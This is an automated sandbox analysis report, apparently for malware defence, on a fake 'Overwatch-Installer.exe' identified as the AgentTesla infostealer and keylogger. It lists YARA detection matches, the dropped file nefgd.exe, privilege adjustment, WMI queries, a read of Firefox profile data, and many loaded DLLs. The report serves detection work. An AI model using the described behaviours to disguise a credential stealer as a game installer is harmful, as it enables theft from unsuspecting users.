Source: Process Memory Space: Overwatch-Installer.exe PID: 7160, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant date = 2018/2, filetype = memory, reference3 = agent tesla == negasteal -- @coldshell, author = j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!, version = stealer, reference1 = https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection, reference2 = https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a
Source: Process Memory Space: nefgd.exe PID: 5952, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant date = 2018/2, filetype = memory, reference3 = agent tesla == negasteal -- @coldshell, author = j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!, version = stealer, reference1 = https://www.virustotal.com/#/file/1198865bc928a7a4f7977aaa36af5a2b9d5a949328b89dd87c541758516ad417/detection, reference2 = https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_negasteal.a
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, type: DROPPED	Matched rule: AgentTesla_1 author = kevoreilly, description = AgentTesla Payload, cape_type = AgentTesla Payload
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, type: DROPPED	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe, type: DROPPED	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload

Source: Overwatch-Installer.exe, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Overwatch-Installer.exe, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Overwatch-Installer.exe, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Overwatch-Installer.exe, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Overwatch-Installer.exe, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Overwatch-Installer.exe, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Overwatch-Installer.exe, DJW.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Overwatch-Installer.exe, DJW.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: nefgd.exe.0.dr, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: nefgd.exe.0.dr, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: nefgd.exe.0.dr, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: nefgd.exe.0.dr, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: nefgd.exe.0.dr, B.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: nefgd.exe.0.dr, B.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@5/5@2/2

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_05BF244E AdjustTokenPrivileges,	0_2_05BF244E
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Code function: 0_2_05BF2417 AdjustTokenPrivileges,	0_2_05BF2417
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_06122576 AdjustTokenPrivileges,	3_2_06122576
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 3_2_0612253F AdjustTokenPrivileges,	3_2_0612253F
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 4_2_056D2576 AdjustTokenPrivileges,	4_2_056D2576
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Code function: 4_2_056D253F AdjustTokenPrivileges,	4_2_056D253F

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

File created: C:\Users\user\AppData\Roaming\nefgd

Jump to behavior

Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\0adb3fa2-395c-4d5d-8556-78f145631ec1

Source: Overwatch-Installer.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Overwatch-Installer.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Overwatch-Installer.exe	Virustotal: Detection: 61%
Source: Overwatch-Installer.exe	ReversingLabs: Detection: 68%

Source: Overwatch-Installer.exe	String found in binary or memory: Overwatch-Launcher
Source: Overwatch-Installer.exe	String found in binary or memory: hle das Installationsverzeichnis aus:Overwatch-LauncherOverwatch-SetupJQW`nw

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

File read: C:\Users\user\Desktop\Overwatch-Installer.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Overwatch-Installer.exe "C:\Users\user\Desktop\Overwatch-Installer.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe "C:\Users\user\AppData\Roaming\nefgd\nefgd.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe "C:\Users\user\AppData\Roaming\nefgd\nefgd.exe"
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 9900
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 9900	Jump to behavior

Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
